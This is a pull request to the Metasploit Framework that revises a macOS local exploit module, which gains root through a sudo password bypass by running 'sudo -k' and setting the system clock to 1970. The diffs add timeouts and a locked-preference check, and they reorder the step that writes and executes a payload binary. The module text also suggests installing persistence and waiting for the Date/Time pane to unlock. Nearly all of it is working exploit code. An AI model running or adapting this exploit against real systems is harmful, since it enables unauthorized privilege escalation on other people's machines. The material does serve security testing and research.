### PR TITLE
Date and Time preference pane locked

### DIFF
--- a/modules/exploits/osx/local/sudo_password_bypass.rb
+++ b/modules/exploits/osx/local/sudo_password_bypass.rb
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     if not user_in_admin_group?
       print_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)."
-      Exploit::CheckCode::Safe
+      return Exploit::CheckCode::Safe
     end
     # one root for you sir
     Exploit::CheckCode::Vulnerable

--- a/modules/exploits/osx/local/sudo_password_bypass.rb
+++ b/modules/exploits/osx/local/sudo_password_bypass.rb
@@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Local
   SYSTEMSETUP_PATH = "/usr/sbin/systemsetup"
   SUDOER_GROUP = "admin"
   VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']]
+  CMD_TIMEOUT = 45
 
   # saved clock config
   attr_accessor :time, :date, :networked, :zone, :network_server
@@ -138,12 +139,12 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     print_status("Saving system clock config...")
-    @time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
-    @date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
-    @networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
-    @zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
+    @time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime",nil,CMD_TIMEOUT).match(/^time: (.*)$/i)[1]
+    @date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate",nil,CMD_TIMEOUT).match(/^date: (.*)$/i)[1]
+    @networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime",nil,CMD_TIMEOUT) =~ (/On$/)
+    @zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone",nil,CMD_TIMEOUT).match(/^time zone: (.*)$/i)[1]
     @network_server = if @networked
-      cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
+      cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver",nil,CMD_TIMEOUT).match(/time server: (.*)$/i)[1]
     end
 
     run_sudo_cmd
@@ -151,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Local
 
   def cleanup
     print_status("Resetting system clock to original values") if @time
-    cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
-    cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
-    cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
+    cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}",nil,CMD_TIMEOUT) unless @zone.nil?
+    cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}",nil,CMD_TIMEOUT) unless @date.nil?
+    cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}",nil,CMD_TIMEOUT) unless @time.nil?
 
     if @networked
-      cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
+      cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On",nil,CMD_TIMEOUT)
       unless @network_server.nil?
-        cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
+        cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}",nil,CMD_TIMEOUT)
       end
     end
 
@@ -172,8 +173,11 @@ class Metasploit3 < Msf::Exploit::Local
     cmd_exec(
       "sudo -k; \n"+
       "#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT"+
-      " -setdate 01:01:1970 -settime 00:00"
+      " -setdate 01:01:1970 -settime 00:00",nil,CMD_TIMEOUT
     )
+    if not cmd_exec("#{SYSTEMSETUP_PATH} -getdate",nil,CMD_TIMEOUT).match("1/1/1970")
+      fail_with(Exploit::Failure::NoAccess,"Date and time preference pane appears to be locked. By default, this pane is unlocked upon login.")
+    end
 
     # Run Test
     test = rand_text_alpha(4 + rand(4))

--- a/modules/exploits/osx/local/sudo_password_bypass.rb
+++ b/modules/exploits/osx/local/sudo_password_bypass.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Local
   CMD_TIMEOUT = 45
 
   # saved clock config
-  attr_accessor :time, :date, :networked, :zone, :network_server
+  attr_accessor :clock_changed, :date, :network_server, :networked, :time, :zone
 
   def initialize(info={})
     super(update_info(info,
@@ -45,8 +45,14 @@ class Metasploit3 < Msf::Exploit::Local
         user has ever run the "sudo" command, it is possible to become the super
         user by running `sudo -k` and then resetting the system clock to 01-01-1970.
 
-        This module will fail silently if the user is not an admin or if the user has never
-        run the sudo command.
+        This module will fail silently if the user is not an admin, if the user has never
+        run the sudo command, or if the admin has locked the Date/Time preferences.
+
+        Note: If the user has locked the Date/Time preferences, requests to overwrite
+        the system clock will be ignored, and the module will silently fail. However,
+        if the "Require an administrator password to access locked preferences" setting
+        is not enabled, the Date/Time preferences are often unlocked everytime the admin
+        logs in, so you can install persistence and wait for a chance later.
       },
       'License'       => MSF_LICENSE,
       'Author'        =>
@@ -129,41 +135,36 @@ class Metasploit3 < Msf::Exploit::Local
     # "remember" the current system time/date/network/zone
     print_good("User is an admin, continuing...")
 
-    # drop the payload (unless CMD)
-    if using_native_target?
-      cmd_exec("mkdir -p #{File.dirname(drop_path)}")
-      write_file(drop_path, generate_payload_exe)
-      register_files_for_cleanup(drop_path)
-      cmd_exec("chmod +x #{[drop_path].shelljoin}")
-      print_status("Payload dropped and registered for cleanup")
-    end
-
     print_status("Saving system clock config...")
-    @time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime",nil,CMD_TIMEOUT).match(/^time: (.*)$/i)[1]
-    @date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate",nil,CMD_TIMEOUT).match(/^date: (.*)$/i)[1]
-    @networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime",nil,CMD_TIMEOUT) =~ (/On$/)
-    @zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone",nil,CMD_TIMEOUT).match(/^time zone: (.*)$/i)[1]
+    @time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
+    @date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
+    @networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
+    @zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
     @network_server = if @networked
-      cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver",nil,CMD_TIMEOUT).match(/time server: (.*)$/i)[1]
+      cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
     end
 
     run_sudo_cmd
   end
 
   def cleanup
-    print_status("Resetting system clock to original values") if @time
-    cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}",nil,CMD_TIMEOUT) unless @zone.nil?
-    cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}",nil,CMD_TIMEOUT) unless @date.nil?
-    cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}",nil,CMD_TIMEOUT) unless @time.nil?
-
-    if @networked
-      cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On",nil,CMD_TIMEOUT)
-      unless @network_server.nil?
-        cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}",nil,CMD_TIMEOUT)
+    if @clock_changed
+      print_status("Resetting system clock to original values") if @time
+      cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
+      cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
+      cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
+      if @networked
+        cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
+        unless @network_server.nil?
+          cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
+        end
       end
+      print_good("Completed clock reset.")
+    else
+      print_status "Skipping cleanup since the clock was never changed"
     end
 
-    print_good("Completed clock reset.") if @time
+    super
   end
 
   private
@@ -173,10 +174,24 @@ class Metasploit3 < Msf::Exploit::Local
     cmd_exec(
       "sudo -k; \n"+
       "#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT"+
-      " -setdate 01:01:1970 -settime 00:00",nil,CMD_TIMEOUT
+      " -setdate 01:01:1970 -settime 00:00"
     )
-    if not cmd_exec("#{SYSTEMSETUP_PATH} -getdate",nil,CMD_TIMEOUT).match("1/1/1970")
-      fail_with(Exploit::Failure::NoAccess,"Date and time preference pane appears to be locked. By default, this pane is unlocked upon login.")
+    if not cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match("1/1/1970")
+      fail_with(
+        Exploit::Failure::NoAccess,
+        "Date and time preference pane appears to be locked. By default, this pane is unlocked upon login."
+      )
+    else
+      @clock_changed = true
+    end
+
+    # drop the payload (unless CMD)
+    if using_native_target?
+      cmd_exec("mkdir -p #{File.dirname(drop_path)}")
+      write_file(drop_path, generate_payload_exe)
+      register_files_for_cleanup(drop_path)
+      cmd_exec("chmod +x #{[drop_path].shelljoin}")
+      print_status("Payload dropped and registered for cleanup")
     end
 
     # Run Test
@@ -209,6 +224,11 @@ class Metasploit3 < Msf::Exploit::Local
     print_line sudo_cmd
     output = cmd_exec(sudo_cmd)
 
+  end
+
+  # default cmd_exec timeout to CMD_TIMEOUT constant
+  def cmd_exec(cmd, args=nil, timeout=CMD_TIMEOUT)
+    super
   end
 
   # helper methods for accessing datastore


### PR DESCRIPTION
Per discussion with @jvennix-r7 in pull request [2302](https://github.com/rapid7/metasploit-framework/pull/2302). 

When the date and time preference pane is locked, the exploit doesn't work. The systemsetup command takes 30 seconds to return, and the date/time preferences are not successfully set. To handle this:
1. Added a timeout to cmd_exec when it calls systemsetup.
2. Added a check after the attempt to set the date and time. If it is not 1/1/1970, fail the exploit. 

Also added a fix for a missing return in the check function. 
